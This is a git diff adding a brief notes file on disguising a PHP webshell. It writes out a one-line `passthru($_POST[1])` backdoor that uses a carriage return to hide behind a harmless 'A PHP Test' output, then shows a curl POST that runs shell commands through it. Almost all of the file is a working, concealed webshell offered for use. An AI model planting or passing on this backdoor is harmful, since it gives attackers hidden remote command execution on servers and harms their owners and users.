diff --git a/php/tw/2015-09-12.php b/php/tw/2015-09-12.php
new file mode 100644
index 0000000..773931f
--- /dev/null
+++ b/php/tw/2015-09-12.php
@@ -0,0 +1,12 @@
+Disguising a PHP Micro Webshell 
+
+` echo -e "<?php passthru(\$_POST[1])?>;\r<?php echo 'A PHP Test ';" > test.php` 
+
+url : http://t.co/YFm6QlpK0k
+
+vist browser  page show `A PHP Test`
+
+then in console 
+`curl -d 1=id http://www.xxx.xx/xx.php`
+
+it like in console show command `id`